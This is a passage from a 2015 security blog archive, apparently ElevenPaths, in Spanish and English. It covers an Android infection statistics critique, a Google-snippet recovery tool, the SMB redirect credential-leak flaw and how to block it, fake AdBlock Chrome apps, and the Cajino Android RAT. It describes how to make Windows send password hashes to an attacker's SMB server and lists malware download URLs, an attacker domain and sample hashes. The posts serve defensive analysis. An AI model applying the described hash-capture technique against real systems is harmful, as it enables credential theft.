comunicación que hace el infectado: en este caso, han dado por hecho que una petición equivale a un infectado. Esto es posible porque tenían acceso al tráfico móvil en Estados Unidos. ¿Incluye conexiones WiFi? El malware más sofisticado puede intentar eludir conexión de datos, o el usuario no tener contratado este servicio. ¿Es Estados Unidos un país suficientemente representativo? Esta misma prueba, según la propia Google (cuyo interés, lógicamente, es dar un mensaje de tranquilidad sobre los niveles de infección) habría sido muy diferente según el país en el que se hubiese realizado. Estudio oficial de Google sobre malware en Android en 2014. PHA = Potentially Harmful Apps En la gráfica queda claro que China, Rusia, Emiratos Árabes... son países con un porcentaje cercanos al 1% de infección. El titular de Damballa no aplica en ellos. Pero centrémonos en Estados Unidos, como el estudio. En ese gráfico, la "media de infección" en US se aprecia superior al 0,1%. Aunque nos manejemos con números pequeños y sólo en este país, es del orden de 16 veces mayor que lo que afirma Damballa (0,0064%). Con aproximaciones diferentes, las conclusiones son muy diferentes. Por ofrecer otra aproximación que igualmente no se corresponde con los resultados de Damballa: En 2013, un informe realizado por Kindsight, también basado en el estudio del tráfico en el operador (no solo dominios, sino inspeccionando el tráfico) hablaba de que el 1% de los Android estaban infectados. Estudio de 2013 elevaba al 1% los Android con malware, basado en un método de tráfico, no de firmas Volviendo al estudio de Damballa, no se dice durante cuánto tiempo se ha realizado el estudio. En 2012 (hay más detalles de ese estudio aquí) hablan de tres periodos de seis días. Suponemos que han calculado la media de 151 millones (entre 130 y 160 millones al día) de dispositivos diferentes conectados a diario. Aunque luego utilizan el total de dominios en lista negra contactados durante todo el tiempo, para calcular el porcentaje. ¿Son estos números representativos? Al margen de todas estas preguntas, la espina dorsal del estudio se basa, creemos, en dos asunciones: Damballa dispone de un conjunto de listas negras de dominios lo suficientemente representativo. En nuestra opinión, en este caso se están sustituyendo firmas (trozos de código o características que definen una muestra) por dominios contactados para detectar malware. Es un método interesante porque un dominio contactado en la lista negra casi "confirma" una infección, pero hereda la misma "imprecisión" de las firmas. ¿Cuántos dominios utilizas? ¿En qué se basa tu criterio para elegir dominios? Quizás se base en, precisamente, los dominios contactados por malware cazado a través de firmas antivirus. Además, la volatilidad de la lista negra de dominios es alta. ¿Se tiene en cuenta? ¿Acaso todo el tipo malware necesita contactar regularmente con dominios? La inmensa mayoría del malware para Android está basado en estafas y llamadas SMS. Muchos de ellos necesitan contactar con servidores pero otros tantos no... ¿Se tienen en cuenta? Un ejemplo claro son los clásicos ZiTM (Zeus in the Mobile), en el que el usuario descarga un programa (ahí sí podría ser detectado por el estudio) y una vez instalado, reenvía los SMS del banco al atacante. No se necesita un dominio C&C con el que contactar regularmente. ¿Qué pasa con los dominios de sistemas de anuncios, legítimos, pero que pueden ser configurados agresivamente para robar información o saturar al usuario de anuncios (adware)?... Al final, el método es tan bueno como la certeza de tu supuesto inicial. En este caso, si la calidad de los dominios en la lista negra no es buena, o si solo salen a la luz las infecciones en las que regularmente se contacta con un C&C, es un método interesante, pero tan válido o inválido como otros tradicionales. Todo el que contacta con uno de esos dominios, está infectado. El que no, no lo está. Como siempre, lo interesante es lo no detectado, lo que escapa a una lista negra o heurística ya diseñada. Ese porcentaje de "infectados silenciosos" que no pueden ser catalogados ni por firma, dominio contactado u otros medios y que saldrán a la luz en futuro... o no. Lo que Damballa y cualquier otro método caza, es simplemente lo conocido en este momento. Es imprescindible añadirle un porcentaje de incertidumbre antes de lanzarse con afirmaciones absolutas. ¿Entonces el titular no es cierto? El titular responde a la investigación, pero el mensaje es peligroso. Creemos que las posibilidades de infectar un móvil no dependen del azar, desde luego, ni que sean tan bajas. El factor fundamental para hablar de "probabilidades de infección", igual que en el escritorio, depende mucho de los hábitos de uso. Y en el mundo móvil, concretamente, está estrechamente ligado (mucho más que con el escritorio, incluso) con qué apps se instalen y de la fuente que provengan. En el mundo móvil, no son populares las infecciones por otros métodos que no sean la instalación directa (no se usan masivamente exploits todavía). Podríamos aventurarnos en este sentido con estudios hipotéticos y sacar otras cifras basadas en estos mismos términos. Imaginemos que un usuario es cuidadoso y solo utiliza Google Play para instalar apps. Usando Tacyt, en octubre de 2014 realizamos un estudio privado en el que concluimos que un 1% de las apps en Google Play eran detectadas por 9 o más motores de VirusTotal. Otros estudios se conforman con catalogar como adware o malware las detectadas por entre 1 o 5 motores, nosotros fuimos conservadores, y aun así no consideramos que sea un método 100% certero. Además, hablamos de apks detectadas... otra cosa es que sean realmente malware, qué tipo de malware y desde luego no se hace asunción alguna sobre las no detectadas. ¿ Podríamos hablar de que las posibilidades reales de infección de un usuario "normal" que solo consume Google Play, son del 1%? Esta afirmación exige tantos matices como el estudio de Damballa, pero tampoco podríamos llamarla descabellada si se documenta convenientemente, aunque las conclusiones sean absolutamente dispares. En resumen, el estudio es correcto, aporta información, pero la conclusión debería tomarse como lo que es: Aproximadamente un 0,0064% de los dispositivos Android funcionando bajo un operador en Estados Unidos contacta con dominios en una lista negra de malware. Sergio de los Santos ssantos@11paths.com @ssantosv
27 de abril de 2015
New tool: Google index Retriever
Have you ever found a webpage that seems to talk exactly about what you need, but it has been removed? Yes, Google cache is the answer but... What if the cache has been removed too? What if the site is just in Google Index page? You can not get the webpage back, but you know it was there. Google Index Retriever will try to retrieve back the index in Google, so you can get part of the text back, and maybe that removed content you need. Google cache is not there forever. From time to time, they are just removed for good. Archive.org and its WayBackMachine does not take as many snapshots of the less popular pages... so, there are some situations where the only part of a web that is left is in the Google Index. Google index is that little part of text in the results page that Google search engine shows when the user searches for anything. In the "index", the searched words matching appear in bold. Google Index is the last part of a web to disappear. So there will be situations where that is the only part left. Google keeps different "indexes" from the same webpage, so, if they could be all put together, the text would be reconstructed and it would maybe come up. But that is not the only situation where the tool may be useful. What if the index contains passwords, credit card numbers or any other sensitive information? In fact that was one of the reasons to create the tool: to demonstrate that removing the webpage and cache with offensive or sensitive content is not enough. The content may be still reachable. This is all explained in this presentation. How does the tool work? It is very easy. The tool is fed with a Google Search that produces an index result. It will try, brute forcing the Google Search ("stimulating it") to retrieve as much as possible. Then, it has some different options: Example with an evernote profile One Shot button: It just searches once with the information provided. Use this to try to be the more specific you can with the search string before hitting on "start button". Start button: It starts searching in automatic mode. Result box will display the time elapsed since the search started, the word that made the information to come up, and finally the longest possible sentence if it differs from the last one, so the user may reconstruct the webpage. The logic to try to "stimulate" the index and get back the information is: First, try to stimulate the index with the words already found in the first index result "around" the main word searched, so it tries to retrieve the whole sentences again and again. If there are no more results or "words around" left, the search is repeated with keywords provided by the user, like a "dictionary attack". When this occurs, the progress bar changes its color. Google, of course will launch a CAPTCHA from time to time because of the continuous use of their service. This is perfectly ok. Google Index Retriever will capture the CAPTCHA so it is easy to resolve and keep on going. Google will show a CAPTCH from time to time Spam This tool may be used as well to check if a site has been probably compromised and injected with spam and black SEO. It is usual that attackers compromise webpages and inject spam words in them so the "steal" their pagerank. Using the tool to find possible "hidden" Spam in a webpage This content is not visible for visitors but only to Google robot and spider, so it is usually visible in this index. This tab works exactly the same as the other, but with another logic: It directly tries to search from a different set of keywords (related to spam) in a Google index result. So this way, it is easier to know if a webpage has been compromised and injected with SEO spam. Other features The program is written in Java, so it should work under any system and version, although it has been tested under Windows. The results may be exported to a html document in the local computer. Keywords and spamKeywords are completely customizable. They may be added individually or edited directly from a TXT file. Customizable keywords The tool is available to download here.
24 de abril de 2015
Nueva herramienta: Google Index Retriever
¿Has encontrado en Google alguna vez una página que parece hablar exactamente de lo que necesitas, pero que ha sido eliminada? Sí, la caché de Google es la respuesta, pero... ¿Y si la caché ha sido eliminada también? ¿Y si el texto solo se encuentra en el índice de Google? No se puede recuperar la página, pero se sabe que estuvo ahí. Google Index Retriever intentará recuperar el índice de Google, para poder obtener parte del texto de la web y así el contenido eliminado que se necesita. La caché de Google no está ahí para siempre. De vez en cuando, se elimina para siempre. Archive.org y su WayBackMachine no toma tantas instantáneas de las páginas menos populares, así que se dan situaciones donde lo único que queda de una página está en el índice de Google. El índice de Google es esa pequeña porción de texto en la página de resultados del motor de búsqueda de Google que se muestra cuando se busca cualquier texto. Es el índice, las palabras buscadas aparecen resaltadas. Google Index es la última parte de una web en desaparecer. Habrá situaciones donde será la única y última parte que queda. Google mantiene índices diferentes para la misma página así que, si se pudieran poner todos juntos, el texto podría reconstruirse y tener la mayor parte de la página eliminada. Pero no es la única situación en la que la herramienta podría ser útil. ¿Y si el índice contiene contraseñas, números de tarjeta de crédito o cualquier otra información sensible? De hecho esto fue una de las razones para crear la herramienta: demostrar que eliminar páginas con contenido sensible u ofensivo, incluso de la caché, no es suficiente. El contenido podría seguir siendo accesible. Todo esto se explica en esta presentación. ¿Cómo funciona la herramienta? Es muy sencilla. La herramienta se alimenta de una búsqueda de Google que produce un índice como resultado. Intentará realizar una especie de fuerza bruta en la búsqueda (estimulándola) para obtener de vuelta tanto texto como sea posible. Example with an evernote profile El botón "One Shot": Busca solo una vez con la información proporcionada. Se utiliza para ser lo más específico posible con la cadena de búsqueda antes de empezar con el botón de "Start". * El botón "Start": Comienza buscando en modo automático. La caja de resultados mostrará el tiempo pasado desde que comenzó la búsqueda, la búsqueda que hizo aparecer la información y finalmente la frase más larga encontrada si difiere de la anterior, para que el usuario pueda reconstruir así la página. La lógica para intentar "estimular" el índice y recuperar la información es: Primero, intenta estimular el índice con las palabras que ya ha encontrado en el resultado del primer índice y se encuentran "alrededor" de la primera palabra buscada, para poder recuperar frases enteras una y otra vez. Si no hay más resultados o no quedan "palabras alrededor", la búsqueda se repite con palabras clave proporcionadas por el usuario como un "ataque por diccionario". Cuando ocurre esto, la barra de progreso cambia de color. Google, por supuesto, lanzará un CAPTCHA de vez en cuando a causa de la búsqueda continua. Esto es perfectamente normal. Google Index Retriever capturará ese CAPTCHA para que sea fácil de resolver por el usuario y pueda continuar Google will show a CAPTCH from time to time Spam La herramienta también puede ser usada para comprobar si una página ha sido probablemente comprometida y se le han inyectado spam como estrategia de Black SEO. Es habitual que los atacantes comprometan páginas e inyecten palabras relacionadas con el spam en ellas para "robar" su pagerank. Using the tool to find possible "hidden" Spam in a webpage Este contenido no se visible por los visitantes sino por los crawlers y robots de Google, así que normalmente se verá en ese índice. Esta pestaña del programa funciona exactamente igual que la otra pero con otra lógica: Intenta buscar directamente desde un conjunto diferente de keywords (relacionados con el Spam) en el índice de Google. De esta forma, es más sencillo saber si una página ha sido comprometida y se le ha inyectado spam relacionado con el Black SEO. Otras funcionalidades El programa está escrito en Java para que pueda funcionar bajo cualquier sistema y versión, aunque ha sido más comprobada en Windows. Los resultados pueden ser exportados a un documento html en local. Las keywords son completamente personalizables. Pueden ser añadidas individualmente o editadas directamente desde un fichero TXT. Keywords configurables La herramienta puede ser descargada desde aquí.
24 de abril de 2015
H4ckM33ts
H4ckM33ts nace con espíritu divulgativo sobre la seguridad en el mundo digital, desde un punto de vista más práctico, realizando talleres y charlas con una participación más activa de sus asistentes. Telefónica crea estos talleres donde se tratarán los temas más acuciantes sobre la seguridad informática, y en Internet, desde todas las perspectivas posibles, "tocando" los riesgos que corremos y analizando con que posibilidades y recursos contamos para evitarlos o en su defecto, mitigarlos. H4ckM33ts empieza hoy su primera edición y lo hará en la ciudad de A Coruña y posteriormente, en sus próximas ediciones; en las ciudades de Barcelona, Palma de Mallorca, Bilbao y Madrid. Os lo iremos anunciando conforme se vayan acercando sus fechas de celebración. Juan Carlos Moreno, responsable de Seguridad de Telefónica de la zona Norte de España, y propulsor de esta iniciativa, será el maestro de ceremonias y quién dará la bienvenida a estas jornadas. Los temas y ponentes seleccionados para estos primeros talleres en Coruña son: Rafa Sánchez, Analista de Seguridad en ElevenPaths, hablará y hará una demo sobre Tacyt, nuestra innovadora herramienta de ciberinteligencia de amenazas móviles. Pablo González, Project Manager en ElevenPaths, impartirá un taller sobre nuestra tecnología Faast + VMS: detección persistente y gestión del ciclo de las vulnerabilidades. Fran Gómez y Mariano González de Sinfonier-Project presentarán el uso de la herramienta Sinfonier a través de casos de uso aplicados al mundo de la seguridad móvil. Javier Soria, del área de seguridad de Telefónica de España, hablará de análisis forense informático - telemático, contará ejemplos de análisis forense en Android, iPhone/iPad, GPS Tom Tom, y explicará cómo borrar de manera segura los dispositivos en empresas cuando se cambian o destruyen. Julio Gómez, dará un taller sobre Web Security DYI y Pablo San Emeterio sobre Win32 Exploit for Scratch. Puedes conocer más detalles en la web de H4ckM33ts así como el perfil y descripción de cada uno de los ponentes seleccionados para estas jornadas. Además, si quieres contactar directamente con ellos, puedes hacerlo a través de la siguiente dirección de correo: info@hackmeets.com Entérate de todo a través de su cuenta en Twitter, te lo estarán contando a partir de las 09:30 horas en directo.
22 de abril de 2015
Hackaton Sinfonier Project en la UJA
Ante la necesidad de dar soporte en tiempo real al procesamiento de la información que se recolecta desde diferentes fuentes, Sinfonier pone a disposición de los usuarios una infraestructura gratuita para que puedan crear sus topologías utilizando los módulos generados por otros usuarios y disponibles en la comunidad para desarrollar los suyos propios. Se trata de una comunidad abierta con un framework de tiempo real (Apache-STORM), un interfaz gráfico intuitivo y una capa de abstracción para facilitar el desarrollo de nuevas funcionalidades y sacar el máximo partido a la información. Pero además, Sinfonier pone a disposición de los usuarios la capacidad de trabajar sobre un entorno privado y dedicado, donde cada usuario puede disponer de todos los recursos que necesite para llevar a cabo sus proyectos. Con menos de un año de vida, esta comunidad gratuita para desarrolladores e investigadores del ámbito de la seguridad se ha convertido en el entorno colaborativo de referencia entre organismos, compañías y especialistas en Ciberseguridad de todo el mundo. Tras su participación en los Campus Party de todo el mundo y en eventos clave del sector, Sinfonier Project llega hoy a la Escuela Politécnica Superior de Jaén con el Hackaton Desfragmentando la Identidad. Durante el día de hoy y hasta mañana, expertos y apasionados de la seguridad se darán cita para conocer este proyecto abierto que pretende democratizar el procesamiento de datos en tiempo real. Para ello, se plantearán diferentes objetivos enfocados al diseño y desarrollo de módulos y topologías que aporten soluciones óptimas relacionadas con el problema de la “Atribución” en base a la información de las identidades digitales. Si quieres participar, eres alumno de la Universidad Politécnica Superior de Jaén y todavía no te has apuntado, aún puedes hacerlo. Regístrate y forma parte del punto de encuentro para la generación de inteligencia a través de fuentes abiertas de información.
16 de abril de 2015
Aclaraciones sobre el fallo de 1997 que "vuelve" a Windows, SMB redirect (y cómo protegerse)
En 1997, Aaron Splanger descubrió un fallo "mítico" en Windows. Se podía forzar a Windows (y a su navegador, más bien) a que enviara las credenciales a una unidad compartida de un servicio del atacante a través de SMB. Simplemente bastaba con poner un enlace a algo como "recurso" en una web... y las credenciales serían "enviadas" mientras se navegaba. El fallo nunca se "corrigió" realmente, solo se mitigó, pero ahora se le ha dado una vuelta de tuerca que lo hace más sencillo de explotar... Veamos si es cierto y cómo protegerse. Ya en 1997 se sabía que, si alguien en una web apuntaba a un recurso tipo "img src="1.2.3.4share1.jpg", un atacante en 1.2.3.4 podía tomar las credenciales de la persona que visitaba la web. Es cierto que las credenciales estarían cifradas, pero en aquel entonces se hacía con LANMAN, o lo que es lo mismo, una pantomima de protocolo de cifrado que no servía para nada. Windows envía las credenciales por defecto para que sea muy cómodo navegar por un dominio logueado con un solo usuario, y se accedan a recursos compartidos de manera transparente. Si no son válidas, se piden nuevas, si lo son, el usuario accede en el dominio a lo que tiene derecho. Es un comportamiento ideal que parece que nunca va a cambiar en Windows, y por tanto, no se "arregló" del todo. Lo que se hizo es, sobre todo, mejorar el cifrado y que hiciera falta realmente hacer "clic" sobre algunos enlaces para entender que realmente se quería acceder a la unidad. Además, actualmente, se utiliza también NTLMv2 como protocolo, que aunque no es perfecto, sí que ofrece una seguridad razonable. O sea, aunque exista un servidor SMB malicioso en la red y se envíen "sin querer" credenciales, lo más probable es que al supuesto atacante le cueste crackear la contraseña. ¿Y qué han descubierto nuevo? La gente de Cylance ha descubierto que se puede conseguir el mismo efecto a través de la redirección HTTP y además usando "file://recurso" (era más habitual "recurso") para estimular el envío de los hashes. Esto abre nuevas puertas de ataque, volviendo "un paso atrás". En resumen, estas APIs (muy populares) dentro de URLMon.dll: URLDownloadToFile URLDownloadToCacheFile URLOpenStream URLOpenBlockingStream ...permiten que, si van a una página que redirige a un recurso SMB a través de un 301 o 302 de Apache (u otros métodos de redirección HTTP), terminarán enviándose los hashes de las credenciales. Ya no es necesario tener que intentar abrir una ruta UNC, o intentar montarlo en una unidad local. Desde ahora se sabe que cualquier programa que use URLDownloadToFile, por ejemplo, y se encuentre con un "file://servidor" en su tráfico, le dará las contraseñas cifradas a ese servidor. Para conseguirlo, basta con darle a ese programa páginas HTTP que redirijan a un "file://". Y esto incluye ya no solo sistemas de Windows, sino cualquier programa que utilice URLMon.dll, que no son pocos. ¿Es grave? El módulo de Cain que caza credenciales SMB Por un lado sí, abre las puertas a ataques más sencillos. Un atacante que controle un poco el tráfico en una red interna podría comenzar a cazar hashes de contraseñas del usuario más rápido y con solo redirigir el tráfico HTTP a un servidor SMB malicioso. También fuera de esa red. Microsoft le resta importancia, por supuesto (e incluso da a entender que no hay nada que arreglar). En realidad el fallo ya era y es explotable. Es cierto que aporta un nuevo vector de ataque que lo facilita, pero el atacante que ya quisiera usarlo, lo estaría haciendo (y de hecho se hace en auditorías internas). Programas como Cain ya disponían de una forma cómoda de, en una red interna, capturar estos hashes. También es cierto que esto no afecta a los atacantes más vulgares a los que no importan quién es su víctima sino cuántas son. A ellos no les interesan las contraseñas. A quien más beneficia esta vuelta de tuerca es a atacantes que buscan una empresa concreta a la que atacar... se les ha puesto en bandeja un método muy sencillo que le permitirá recopilar contraseñas de forma todavía más automatizada. Parece que facilita el ataque alojado "fuera de la red interna" (si es que se permite el tráfico SMB hacia redes externas) y en la interna lo potencia, además en que se amplía mucho el rango de programas o incluso scripts vulnerables. ¿Cómo protegerse? Existen al menos tres formas, que ya debían estar implementadas para protegerse del ataque de 1997... pero vamos a recordarlas: Obvia: mejorando las contraseñas. Las contraseñas que se envían están cifradas. Obviamente, si es más compleja de lo normal, puede que no pueda ser crackeada en un tiempo razonable. Mejorando el protocolo. Por muy compleja que sea la contraseña, si se usa LM para autenticarse en red, nada servirá. Asegurarse de que se usa NTLMv2 y solo NTLMv2 para la autenticación en red. Eso está en esta opción de Windows (ver imagen). Pero no es suficiente con la opción por defecto... puesto que permitiría realizar un "downgrade" a LM quizás bajo ciertas circunstancias. Es necesario evitar el comportamiento por defecto y realmente rechazar LM. Configurar Windows para que solo envíe hashes a través del protocolo NTLMv2 Limitando el tráfico SMB que sale. Normalmente el tráfico SMB va por el puerto 445 y 139 (UDP y TCP). El cortafuegos saliente podría evitar que saliese este tráfico a la red externa... Para limitar el tráfico se puede usar el cortafuegos corporativo, o el de Windows en local. Usando el cortafuegos saliente de Windows para crear una lista blanca de servidores SMB a los que se accede También se puede mejorar la configuración de Windows. Existe un truco poco conocido que permite hacer una lista blanca de con qué servidores SMB nos vamos a comunicar, y evitar enviar credenciales al resto. Primero hay que "Denegar todo" en la opción de seguridad correspondiente. Y luego alimentar la lista blanca de direcciones IP o nombres NetBIOS. Creando una lista blanca hacia servidores externos desde las políticas de seguridad Por último, jugar con la posibilidad de firmar el protocolo SMB, pero resulta algo más complejo. En resumen, la propia Microsoft ofrece muchas herramientas para protegerse. Y la razón de que haya tantas es por flexibilidad: la mejor forma será la que cause menos incompatibilidad en el sistema en el que se aplique. Sergio de los Santos ssantos@11paths.com @ssantosv
14 de abril de 2015
Fake AdBlocks in Chrome Web Store leads to... ¿adware?
No platform is free from abuse. Chrome Web Store has been abused in the past, mainly by ad injectors or general adware. In fact, Google has just removed almost 200 offensive extensions affecting 14 million users. But, what if apps and extensions are just the "way" to convince to install some other software or to visit a webpage? Apps and extensions as a spam technique? This has been happening for a while now with fake "AdBlocks" that leads to some other Russian anti-adware, using the Web Store as a spamming platform. It is, in a way, a similar situation as when we found fake AdBlocks in Google Play and the recent use of Google Play Books as a platform for spreading adware and malware. Chrome Web Store is hosting fake AdBlocks, one of the most popular extensions for browsers. These apps (they are not extensions) are harmless "per se", since they are just redirectors to some other website where some other programs are offered. Not specially dangerous... by now. This technique may result quite successful for attackers that want to "spam" their content, programs, adware or anything else. Does this mean Chrome Web Store is storing adware/malware directly with these fake apps or extensions? Not at all (they are hosting ad injectors but trying to remove them), but they are allowing developers to upload fake extensions that take advantage of a reputed brand (like AdBlock) to confuse users and get them to download something else. Nothing new, except maybe for the platform used. How they work Detected fake AdBlocks are very simple typical Chrome apps. We have found the same program with little differences under several different developer accounts. Here are some samples (not all of them appeared at the same time): Some of the AdBlocks detected from different developers These apps need no permissions. That is strange and "impossible" if it was a real AdBlock, since these apps should be able at least to read and modify data in the websites you are visiting. Even more, they should be real extensions, rather than apps. No permissions needed Internally, the only thing these apps do is this: Fake AdBlockPlus code (in background.js file) chrome.runtime.onInstalled.addListener: Means that, once the app is installed, this webpage will be opened in Chrome. chrome.app.runtime.onLaunched.addListener: Means that, when it is launched, this webpage is opened in Chrome. URLS to go to are being changed all the time. Where they go to These are the links we have seen so far: hxxp://www.appforbrowsers.com/adguard.html hxxp://www.surprisess.com/adguard.html hxxp://www.appforchrome.com/adguard.html And there are some others that, after going to some kind of app aggregator, redirect to the real AdBlock. hxxp://prodownnet.info/adblock-super/ hxxp://appstoreonline.blogspot.com/search/label/adblock%20chrome hxxp://appstoreonline.blogspot.com/search/label/adblock%20youtube Most of them open websites that encourage the user to download a program called Adguard. A supposed ad-blocker for PC that has its own extensions for different browsers. Is this adware disguised as an anti-adware? Not an easy answer. Google blocks the site if visited with Chrome, at least a few days ago. It means Google (and maybe just them) think or thought some day that this URL should be in a blacklist. Google blocking adguard installer a few days ago We know that Adguard app was removed (maybe by Google, maybe by the owners) from Google Play last December. Moreover, some engines in VirusTotal, think that this is some kind of malware, detecting it with generic signatures (except Rising, the Chinese AV). Some engines detecting the AdGuard installer It could be a false positive, something not widely discovered yet, or just this kind of software that are legal and moving on this grey zone where some AV engines have to "respect" them by not detecting them... but are harmful for users once installed anyway. The only way to know it for sure, would be a manual analysis. A quick analysis shows that the exe itself is changing very often. It is just a downloader for download.adguard.com/setup.exe which is a much more complex program and, again, detected just by one engine with generic signatures... which means nothing. Although Google and some AVs are detecting it, it is, most likely, not a dangerous program. And, probably as well, they are not the ones directly responsible for these fake AdBlocks... They may have a rewarding program for websites bringing downloads... who knows. Conclusions The important thing is not fake Chrome Apps pointing to some adware blocker. The conclusions could be: Obvious, but any platform is susceptible of being abused and "spammed". Chrome Web Store is being abused in an "innocent" way (aside the ad injectors) with fake apps, to induce the user to visit and download some other software. Using the same name and icon of reputed programs as a bait, is very effective for attackers... but easy to track and avoid for the store. Although it seems to redirect to some software in a "spamming" campaign aimed to get more "visits" and that's all so far... what if it redirects to some other website? Would it be as effective from the attackers' standpoint as these ad injectors with 14 million affected users? We may see more apps like this in the future leading to real aggressive adware or malware. Users have to be careful interpreting AV results, for good or bad, false positives exist... and of course false negatives do as well. But with enough ratio of both, the average user never really gets to know. The Chrome app launcher after installing some fake ABP Sergio de los Santos ssantos@11paths.com @ssantosv
7 de abril de 2015
El mes de la RATa en Google Play
Hace algunos días, Lukas Stefanko de ESET descubrió un nuevo sistema de administración remota para Android. Aunque ya se conocen sistemas RAT para Android, este malware tenía algo de especial. Usaba las notificaciones de Baidu Cloud Push para el envío de comandos a las víctimas. Podemos confirmar (no se hace en la noticia original) que esta RAT ha estado no solo disponible en mercados alternativos, sino también en Google Play por, al menos, un mes. Existen diferentes tipos de RAT para Android. Dos funciones fundamentales la definen: Qué y cómo puede controlar del dispositivo. Cómo recibe instrucciones la víctima. Cómo se reciben los comandos abre un puñado de posibilidades: HTTP, SMS, Jabber, GCM (Google Cloud Messaging)... y ahora notificaciones Baidu Cloud Push. Cloud Push es un sistema en el que los desarrolladores pueden registrar usuarios. Los usuarios registrados recibirán notificaciones push en sus dispositivos (una notificación especial en la barra de tareas). Este sistema es usado por millones de apps legítimas, y Google permite el uso de CGM gratis. Este sistema ya ha sido usado para acciones maliciosas anteriormente, Cualquier desarrollador puede crear "su propio GCM", y Baidu es el popular en China. Este ha sido usado en esta ocasión para enviar comandos a la botnet. La técnica es nueva. Tan nueva, que el malware no ha sido detectado por los motores antivirus en meses. ¿Qué hace el RAT? Infecta el sistema y queda a la espera de comandos que vendrán del servidor, que es una instancia de Baidu Cloud Push especialmente manipulada. Básicamente, la figura de abajo lo resume: Comandos que el atacante puede enviar al dispositivo Se muestran los comandos que el dispositivo podría recibir de Baidu. La app cuenta con los permisos necesarios para realizar las tareas, así que el dispositivo infectado queda a completa disposición del atacante. Toda la información va a través de la ruta "/mnt/sdcard/DCIM/Camera/%file_name%" antes de ser subida al servidor de Baidu cloud storage (BCS) y eliminada del dispositivo. No solo en los mercados alternativos Stefanko encontró los samples en mercados alternativos, lo que resulta "normal" de alguna forma. Pero algunos de estas muestras sí que estuvieron en Google Play durante más de un mes. Con más de 50.000 descargas, las víctimas podrían seguir bajo el control del atacante. Una de las RAT, disponibles en Google Play Gracias a Tacyt (aunque no hemos encontrado estas muestras a tiempo) sabemos ahora que algunas muestras diferentes con el mismo comportamiento estaban disponibles en Google Play desde, al menos, noviembre de 2014. Algunas muestras, bajo el nombre de ciertos desarrolladores, fueron creadas durante noviembre de 2014 y estuvieron disponibles desde diciembre. Las apps estuvieron disponibles hasta finales de enero, cuando Google las eliminó. Parece que otras estuvieron disponibles desde septiembre hasta finales de enero, bajo otras cuentas falsas. Estas apps están todavía en otros markets. El desarrollador parece provenir de Corea del Sur. Ha estado usando diferentes nombres y correos: "zhengcaiai", "devzhemin520", "su weiyu"... Este dominio también le pertenece: http://devzhemin.dothome.co.kr. ¿Y los antivirus? Las muestras no han sido detectadas por al menos cinco meses: Una de las RAT, no siendo detectada Hasta aproximadamente el 17 de marzo, no era detectada. ESET y Avira han sido los primeros en detectarlas. Los primeros motores que cazaban la muestra Pocos días después, muchos otros han creado la firma para detectarlos, pero no todos los "grandes" todavía. Más motores que detectan las muestras Lo han llamado la RAT "cajino" por el nombre de paquete encontrado por Stefanko. Todos los nombres comenzaban con la cadena ca.ji.no.method[*] y un número. Pero el atacante también ha usado la estructura han[*].play.app para nombrar las apps en Google Play. Las versiones más nuevas son menos detectadas Para las nuevas versiones, los únicos que las cazan son Avast, DrWeb y ESET, los que crearon las firmas originales. Esto muestra perfectamente la noción de "firmas de calidad" que protegen al usuario en el futuro tanto como es posible. Conclusiones Las RATs para Android no es que sean poco comunes, pero tampoco habituales. Además de las conclusiones del investigador de ESET, lo interesante que consideramos necesario señalar es que: Se han usado nuevos métodos de comunicación. Las apps no han sido detectadas ni por investigadores ni antivirus durante al menos seis meses. El atacante ha estado en Google Play (el sitio predilecto para atacantes) durante al menos un mes. Y seguirán consiguiendo más víctimas, porque la app todavía se encuentra en diferentes mercados. No es habitual que se encuentren RATs en Google Play. Una de las últimas noticias al respecto es la de Dendroid, una RAT diseñada para eludir los controles de Google Play, hace un año. Algunos hashes diferentes (además de los encontrados por ESET) son: 7a131e44d731995e51b7e439082273abbbf02602 48412835d0855c565f213242b0db7a26480fcc2e 4c9e505f1132528c68091fa32bb1844d7cbd2687 31a645973554b7c83cc0bd6fb7709ec12937c962 El atacante está distribuyendo (además de por otros mercados) la apk desde aquí: hxxp://guangzhouhan1.dothome.co.kr/music.apk, así que podrían cambiar en cualquier momento. Sergio de los Santos ssantos@11paths.com @ssantosv
30 de marzo de 2015
The month of the RAT in Google Play
A few days ago, Lukas Stefanko from ESET discovered a new remote administration system RAT for Android. Although there are some known RATs for Android, this malware had something special. It used Baidu Cloud Push notifications for sending commands to the victims. What we can confirm (not in the original blog entry), is that this RAT has been available not only in "alternative markets", but in Google Play, undetected for more than a month. Several kind of RATs for Android exist. There are two basic conditions that defines an RAT: What and how it is able to control the infected device. How the victim receives the commands. How the victim receives the commands opens a handful of possibilities: HTTP, SMS, jabber protocol, GCM (Google Cloud Messaging)... and now Baidu Cloud Push notifications. Cloud Push is a system where developers can register users. Registered users will receive push notifications in their devices (an special notification in the task bar). This is used in millions of legitimate apps, and Google allows the use of its GCM for free. This system has been abused to push ads in the past. Any developer may create his own CGM, and Baidu has a popular one in China. This time it has been abused to push commands to this botnet. This technique is quite new. So new, the malware has not been detected by antiviruses for months. What does the RAT do? It infects the system so is waiting for commands from the Command and Control server, which is a specially crafted Baidu Cloud Push instance. Basically, this picture below summarizes it all. Commands that the attacker may send to the device It shows the commands the device may get from Baidu. The app counts with every necessary permission to perform the tasks, so the infected user is completely at the attackers disposition. All the information goes through "/mnt/sdcard/DCIM/Camera/%file_name%" before being uploaded to the Baidu cloud storage (BCS) and removed from the device. But... this has not only been in alternative markets Stefanko found the samples in alternative markets, which is, in a way, "expected". But some of these samples were indeed in Google Play... for more than a month. With more than 50.000 downloads, the victims may still be under the control of the attacker. One of the RATs, available in Google Play Thanks to Tacyt (although we did not found these samples on time...) we now know that some different samples with the same behavior were available in Google Play from, at least, November 2014. Some samples, under a certain developer, were signed during November 2014, and were available in Google Play since December. The apps were available in the main market until late January, when Google removed them. It seems that some others were available from September until late January as well, under some other fake account. These apps are still in lots of other markets. The developer seems to be from South Korea. He has been using different names and emails: "zhengcaiai", "devzhemin520", "su weiyu"... This domain belongs to the attacker as well: http://devzhemin.dothome.co.kr. What about antiviruses? The samples were not detected about five months ago, when it all started. One of the RATs not being detected Until March 17th approximately, it was fully undetected. ESET and Avira have been the first ones detecting them. Some of the first engines detecting the samples A few days later, some others have created a signature, but still not all the big players. Some more engines detect the samples They have named it "cajino" RAT because of the packageName that Stefanko found. They all started with ca.ji.no.method[*] and a number. But the attacker has also used han[*].play.app structure for naming the apps in Google Play. Newer versions are less detected For newer versions, the only ones catching them are Avast, DrWeb and ESET, the ones that created the original signatures. This perfectly shows the notion of "quality signatures" that protects the user from future versions as much as possible. Conclusions RATs are not "rare" in Android world, but they are not usual, either. Aside from the conclusions of the ESET researcher, the important issues to 